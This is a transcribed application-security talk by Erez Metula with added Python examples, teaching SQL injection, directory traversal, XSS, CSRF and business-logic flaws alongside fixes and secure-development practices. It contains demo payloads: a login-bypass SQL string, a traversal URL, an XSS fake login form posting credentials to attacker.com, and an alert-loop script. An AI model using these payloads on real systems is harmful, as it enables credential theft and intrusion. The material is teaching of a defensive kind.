
Do You Write Secure Code? by Erez Metula


DESCRIPTION

Erez Metula at the alphageeks #4 meetup speaks about secure coding, common threats and how to address them. Check us out at: alphageeks.blogli.co.il


Page 1: Do You Write Secure Code? by Erez Metula

Do you write secure code?

Erez Metula, CISSP
Application Security Consultant & Trainer

[email protected]

Agenda
• What is application security
• What are application level vulnerabilities
• Demos
• Security procedures
• How to improve the development lifecycle

Page 2

Growing concern

What is Application Security?

• It is not about network security!!!
  • It's not about firewalls, Intrusion Detection Systems, operating system hardening, database hardening, etc.
  • Network security mostly ignores the contents of HTTP traffic
  • Common myth – "We have a firewall!"

• It is about:
  • Securing the code that drives a web application
  • Securing backend systems – web server, DB, etc.
  • Securing the users!!!

Page 3

Application Security Is A Different World

• Network Security
  • Part of IT
  • Networking Experts
  • Product Focused
  • 1000's of Copies
  • Signature Based
  • Patch Management

• Application Security
  • Part of Business Units
  • Software Experts
  • Custom Code Focused
  • 1 Copy of Software
  • No Signatures
  • Prevent Vulnerabilities

We can't rely on network security techniques to gain application security

Application security layer

Page 4

OWASP Top 10 (2010)

DEMO – SQL Injection

• Developer concatenates SQL statements
• Hacker types: ' or 1=1 --
• Result – the first database entry (might be the Admin!)

http://www.victim.com/HacmeBank_v2_Website/aspx/Login.aspx

Developer's code:
string sql = "select * from Users where user ='" + User.Text + "' and pwd='" + Password.Text + "'";

Statement that actually reaches the database:
string sql = "select * from Users where user ='' or 1=1 --' and pwd=''";
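The slide's concatenated query and its parameterized counterpart, executed against a constructed in-memory SQLite table so the effect of the typed input can be observed offline. This is an added example, not code from the deck (the deck's demo is ASP.NET/C# against Hacme Bank); the table contents, the column names `user`/`pwd` and the function names are assumptions, while the input `' or 1=1 --` is the one typed in the slide.

```python
import sqlite3

# Constructed sample data standing in for the demo's Users table.
# Passwords appear in clear only to mirror the slide's query; a real
# application stores a salted password hash, never the password.
USERS = [
    ("admin", "s3cret-admin"),
    ("david", "david123"),
    ("alice", "wonderland"),
]

PAYLOAD = "' or 1=1 --"  # the input typed in the slide's demo


def make_db():
    """Create an in-memory database holding the constructed Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table Users (user text, pwd text)")
    conn.executemany("insert into Users values (?, ?)", USERS)
    return conn


def login_concatenated(conn, user, pwd):
    """The slide's pattern: SQL assembled by string concatenation.

    Deliberately vulnerable. The quote in the input closes the literal,
    'or 1=1' makes the predicate true for every row, and '--' comments
    out the password check. Returns the matched user names.
    """
    sql = ("select user from Users where user ='" + user
           + "' and pwd='" + pwd + "'")
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, user, pwd):
    """Same lookup with bound parameters.

    The SQL text is fixed; the values travel separately to the engine,
    so quotes and comment markers inside them are data, never syntax.
    """
    sql = "select user from Users where user = ? and pwd = ?"
    return [row[0] for row in conn.execute(sql, (user, pwd))]


def demo():
    """Run both variants against the constructed table and return the rows."""
    conn = make_db()
    return {
        "concatenated": login_concatenated(conn, PAYLOAD, ""),
        "parameterized": login_parameterized(conn, PAYLOAD, ""),
        "legit": login_parameterized(conn, "david", "david123"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:14s} -> {rows}")
```

The concatenated query returns every row, so whichever row the engine returns first (here the admin) is the account that gets "logged in"; the parameterized query returns nothing for the same input. Binding parameters removes the whole class of bug regardless of what is typed, which is why it, rather than filtering the input for quotes, is the fix.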

Page 5

A little bit of humor..

DEMO – Directory traversal

• The following demo shows an innocent-looking page, letting the user download a requested file from the base dir.
• Legitimate use:
  http://www.victim.com/SendPdf/WebForm1.aspx?file=somefile.pdf
• But the user can get out of the base directory..
  http://www.victim.com/SendPdf/WebForm1.aspx?file=../../progs/secret/SecretFile.pdf
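How a download handler keeps the `file` parameter inside the base directory, written as an added example rather than the SendPdf page's own code (which the deck shows only as a URL). The base directory `/srv/sendpdf/files`, the allow-list pattern and the function names are assumptions; the two request URLs are the slide's.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Constructed base directory; the slide's page serves files "from the base dir".
BASE_DIR = "/srv/sendpdf/files"

# Allow-list for the file name: letters, digits, '.', '_' and '-' only,
# must end in .pdf. No path separator is permitted, so "../" cannot occur.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.pdf$")


def resolve_download(base_dir, requested):
    """Map the requested name to an on-disk path, or return None.

    Two independent checks, so a mistake in one does not reopen the hole:
    1. the name must match the allow-list, which rejects separators,
       '..' sequences, absolute paths and NUL bytes outright;
    2. after resolving symlinks, the path must still lie inside base_dir
       (the containment check the vulnerable page lacks).
    """
    if not isinstance(requested, str) or not SAFE_NAME.match(requested):
        return None
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, requested))
    # commonpath, not startswith: "/srv/sendpdf/files2" must not pass as inside.
    if os.path.commonpath([base, full]) != base:
        return None
    return full


def handle_request(url, base_dir=BASE_DIR):
    """Extract the 'file' query parameter from a request URL and resolve it.

    parse_qs percent-decodes first, so an encoded "..%2F" arrives at
    resolve_download as "../" and is rejected like the plain form.
    """
    params = parse_qs(urlsplit(url).query)
    requested = params.get("file", [None])[0]
    return resolve_download(base_dir, requested)


if __name__ == "__main__":
    for u in ("http://www.victim.com/SendPdf/WebForm1.aspx?file=somefile.pdf",
              "http://www.victim.com/SendPdf/WebForm1.aspx?file=../../progs/secret/SecretFile.pdf"):
        print(u, "->", handle_request(u))
```

The allow-list alone would already stop the slide's traversal; the containment check is kept because it also catches a symlink planted inside the base directory that points elsewhere, something a name check cannot see.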

Page 6

DEMO – Cross-Site Scripting (XSS)

• Web browsers execute code sent from websites
  • HTML
  • Javascript
  • Flash, etc.
• Send malicious code to other users
  • The attacker is using the website to forward an attack!

http://www.victim.com/xss/xss.asp?username=david

http://www.victim.com/xss/xss.asp?username=<br>please login:<form action="http://www.attacker.com" name=a method="post">username:<br><input type=text name=b><br>password:<br><input type=password name=c><br><input class=w type=submit value="login"></form>

Demo – Denial of Service using XSS

• Prevent legitimate users from using the hacmebank site (while true injection)
  <script>while(true){alert("service unavailable");}</script>
• Such a short line can cause so much damage..!!!
• Other possibilities
  • Delete a specific user (competent?)
  • Change password for a specific user
  • Delete all the tables/database…
  • Format the server HD
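What separates the vulnerable `xss.asp` from a fixed page is where the `username` parameter ends up: copied into the HTML verbatim, or encoded for the context it lands in. The following is an added example, not the deck's or Hacme Bank's code; the page template and function names are assumptions, and the two payloads are taken from the slides above (the fake login form and the `while(true)` alert loop).

```python
import html

# Payloads from the slides, embedded here as constructed test input.
PHISHING_FORM = ('<br>please login:<form action="http://www.attacker.com" name=a '
                 'method="post">username:<br><input type=text name=b><br>'
                 'password:<br><input type=password name=c><br>'
                 '<input class=w type=submit value="login"></form>')
DOS_SCRIPT = '<script>while(true){alert("service unavailable");}</script>'


def render_vulnerable(username):
    """xss.asp as the slide describes it: the parameter is copied into the
    page unchanged, so markup and script in it are parsed and executed."""
    return "<h1>Welcome " + username + "</h1>"


def render_safe(username):
    """HTML-body context: every character with meaning to the HTML parser
    ('<', '>', '&', quotes) becomes an entity. The browser displays the
    text of the payload instead of interpreting it."""
    return "<h1>Welcome " + html.escape(username, quote=True) + "</h1>"


def render_attr_safe(username):
    """Attribute context: the value sits inside a quoted attribute and is
    escaped with quote=True, so '"' and "'" are encoded and the input
    cannot close the attribute and start a new one (or a new tag)."""
    return ('<input type="text" name="username" value="%s">'
            % html.escape(username, quote=True))


def contains_active_markup(fragment):
    """Does the rendered fragment still contain a tag the browser would act on?"""
    low = fragment.lower()
    return "<script" in low or "<form" in low or "<input" in low


if __name__ == "__main__":
    for payload in (DOS_SCRIPT, PHISHING_FORM):
        print("vulnerable:", contains_active_markup(render_vulnerable(payload)))
        print("safe      :", contains_active_markup(render_safe(payload)))
```

Encoding is chosen per output context (body text, attribute, JavaScript string, URL); `html.escape` covers the first two, and a value placed inside a `<script>` block or an `href` needs the encoding for that context instead.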

Page 7

Business logic attacks

• Flaws that allow a user to do something that isn't allowed by the business
• Cannot be detected by a vulnerability scanner
• One of the hardest to detect
• Specific to the application being tested
• Some examples
  • Negative amount of money
  • Skipping security checks
  • Performing operations in a different order
• DEMO
  • Withdraw becomes a deposit
  • Casino
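Server-side rule enforcement for the two example flaws named on this slide, a negative amount that turns a withdrawal into a deposit, and steps performed out of order. Added example, not the deck's demo code; the account model, the per-transaction limit and the two-step transfer flow are assumptions made to illustrate the checks.

```python
from decimal import Decimal, InvalidOperation


class BusinessRuleViolation(Exception):
    """Raised when a request is well-formed but breaks a business rule."""


class Account:
    """Constructed toy account; money is Decimal, never float."""

    def __init__(self, owner, balance):
        self.owner = owner
        self.balance = Decimal(balance)


MAX_AMOUNT = Decimal("1000000")  # assumed per-transaction ceiling


def parse_amount(raw):
    """Validate an amount sent by the client.

    The client controls the string completely, so it may be '-100' (the
    slide's withdraw-becomes-deposit), 'NaN', '1e30' or not a number at all.
    Only a finite, positive value with at most two decimals survives.
    """
    try:
        amount = Decimal(str(raw))
    except InvalidOperation:
        raise BusinessRuleViolation("amount is not a number")
    if not amount.is_finite() or amount <= 0:
        raise BusinessRuleViolation("amount must be positive")
    if amount > MAX_AMOUNT:
        raise BusinessRuleViolation("amount exceeds transaction limit")
    if amount != amount.quantize(Decimal("0.01")):
        raise BusinessRuleViolation("amount has too many decimal places")
    return amount


def withdraw(account, raw_amount):
    """Withdraw on the server; nothing the client-side form did is trusted."""
    amount = parse_amount(raw_amount)
    if amount > account.balance:
        raise BusinessRuleViolation("insufficient funds")
    account.balance -= amount
    return account.balance


class Transfer:
    """Two-step operation whose order the server enforces.

    The confirmed amount is kept on the server, not in a hidden form field,
    so the client can neither skip confirmation nor change the amount
    between confirmation and execution.
    """

    def __init__(self, source):
        self.source = source
        self.confirmed = None

    def confirm(self, raw_amount):
        self.confirmed = parse_amount(raw_amount)
        return self.confirmed

    def execute(self, raw_amount):
        if self.confirmed is None:
            raise BusinessRuleViolation("confirm before executing")
        if parse_amount(raw_amount) != self.confirmed:
            raise BusinessRuleViolation("amount changed after confirmation")
        new_balance = withdraw(self.source, self.confirmed)
        self.confirmed = None  # one confirmation, one execution
        return new_balance


def is_rejected(fn, *args):
    """Helper: True if the operation is refused by a business rule."""
    try:
        fn(*args)
    except BusinessRuleViolation:
        return True
    return False


if __name__ == "__main__":
    acct = Account("david", "100.00")
    print("withdraw 25.50 ->", withdraw(acct, "25.50"))
    print("withdraw -100 rejected ->", is_rejected(withdraw, acct, "-100"))
```

A scanner sees only valid-looking requests here; the rule that an amount must be positive and a confirmation must precede execution is knowledge of this application, which is why the slide counts these flaws among the hardest to detect.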

Cross Site Request Forgery (CSRF)

• Another client-side attack
• Resembles XSS, but quite different
• The victim's browser is tricked into issuing a command to a vulnerable web application
• The browser's outgoing request automatically includes the user's data (session id, authentication tickets, IP address, etc.)
• Impact
  • Perform transactions on behalf of the user
  • Access private networks
  • Access sensitive data
  • Modify user's data

Page 8

CSRF Illustrated

1. Attacker sets the trap on some website on the internet (or simply via an e-mail): a hidden <img> tag contains the attack against the vulnerable site
2. While logged into the vulnerable site, the victim views the attacker's site: the <img> tag is loaded by the browser and sends a GET request (including credentials) to the vulnerable site
3. The vulnerable site sees a legitimate request from the victim and performs the action requested

[Diagram: the forged request reaches the application with the CSRF vulnerability; its custom code fronts the business functions Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt and E-Commerce]

CSRF via phishing e-mail

Unusual activity.msg

Page 9

CSRF via malicious web site

• You visit a malicious web site
• The web site instructs your browser to submit a request to some CSRF-vulnerable page on the victim application
• Your browser performs the operation
• IE7 / Mozilla – at least an open tab
• IE6 – from the same window
• Example:
  http://www.attacker.com/csrf/InnocentSite.asp
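The server side of a state-changing action defended against the scenario on these two CSRF slides, as an added example that is not part of the deck. It uses a synchronizer token derived from the session with an HMAC; the route `/transfer`, the cookie and field names, and the session value are assumptions.

```python
import hashlib
import hmac
import secrets

# Constructed server secret; in a deployment it comes from configuration.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Synchronizer token bound to the session: HMAC-SHA256(secret, session id).

    Only a page we served can embed it, and a page on another origin cannot
    read it, so a forged request cannot carry the right value.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def render_transfer_form(session_id):
    """The legitimate page: the token travels in a hidden form field."""
    token = issue_csrf_token(session_id)
    return ('<form method="post" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="to"><input name="amount"><input type="submit"></form>')


def handle_transfer(method, cookies, form):
    """Handle the state-changing request. Returns (status, message).

    Three rules that together defeat the <img>-tag scenario on the slides:
    - state changes are POST only, so the GET an <img> issues never acts;
    - the token must arrive as a form field, not as a cookie (cookies are
      what the browser attaches automatically, which is the whole problem);
    - the token must match the one derived from the session cookie,
      compared in constant time.
    """
    if method != "POST":
        return 405, "method not allowed"
    session_id = cookies.get("session")
    if not session_id:
        return 401, "not logged in"
    expected = issue_csrf_token(session_id)
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):
        return 403, "csrf token missing or invalid"
    return 200, f"transferred {form['amount']} to {form['to']}"


def demo():
    """Replay the three request shapes from the slides against the handler."""
    cookies = {"session": "victim-session-42"}  # constructed session cookie
    # 1. GET issued by a hidden <img> tag on another site; cookie attached.
    img_get = handle_transfer("GET", cookies, {"to": "attacker", "amount": "1000"})
    # 2. POST submitted by a page on another origin; cookie attached, token unknown.
    forged_post = handle_transfer("POST", cookies, {"to": "attacker", "amount": "1000"})
    # 3. The genuine form, whose hidden field carries the matching token.
    token = issue_csrf_token(cookies["session"])
    genuine = handle_transfer("POST", cookies,
                              {"to": "alice", "amount": "50", "csrf_token": token})
    return img_get, forged_post, genuine


if __name__ == "__main__":
    for label, result in zip(("img GET", "forged POST", "genuine POST"), demo()):
        print(f"{label:13s} -> {result}")
```

Checking the method alone is not enough, since the slide's malicious site can also make the browser submit a POST; the token is what the cross-origin page cannot obtain. Marking the session cookie `SameSite` adds a second, browser-enforced layer on top of this check.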

What to do?

• In order to avoid application level threats, we usually perform
  • Penetration testing
  • Code review
  • Threat modeling
  • SDL – Secure Development Lifecycle

Page 10

Penetration Testing

• Testing the security of systems and architectures from a hacker's point of view
• Blackbox approach – a "simulated attack"
• Identifying weaknesses in already deployed targets; for example, platform tests include:
  • Information disclosure
  • Escalation of privileges to valid users
  • Denial of service
  • Unauthorized access
• Penetration testing is usually done when development completes

Problem – cost of change

Page 11

Code review

• Security code review is a process to improve software security by reviewing it "from the inside"
• Whitebox approach
• This process should be performed by the developer and by 3rd-party security personnel
• The main objective is to
  • Detect vulnerabilities in code
  • Identify bad application level configuration
  • Detect backdoors

Threat Modeling

Threat Modeling Process
1. Identify Assets
2. Create an Architecture Overview
3. Decompose the Application
4. Identify the Threats
5. Document the Threats
6. Rate the Threats

Page 12

We need secure development methodologies

• Current development methodologies lack security procedures
• Security should be performed from the initial project stages
• Security should be embedded into the development lifecycle
• SDL – Secure Development Lifecycle

SDL – "Integrate" Security within the Application Life Cycle

[Diagram: each lifecycle phase paired with its security activity]
Requirements / Use Cases – Security Requirements
Design – Threat Modeling / Secure Design
Code – Code Review
Test – Penetration Testing
Deploy – Secure Deployment

Page 13

Don't rely on only one countermeasure ….

Summary

• Application security is different from other security layers
• Traditional security products (firewall, antivirus, IPS, SSL, etc.) do not help to mitigate application threats
• You should perform application security by doing
  • Code review
  • Application penetration test
  • Design review
  • Integrate security into the development cycle
• Example – SDL (Secure Development Lifecycle)

Page 14

Questions?

Thank you!

[email protected]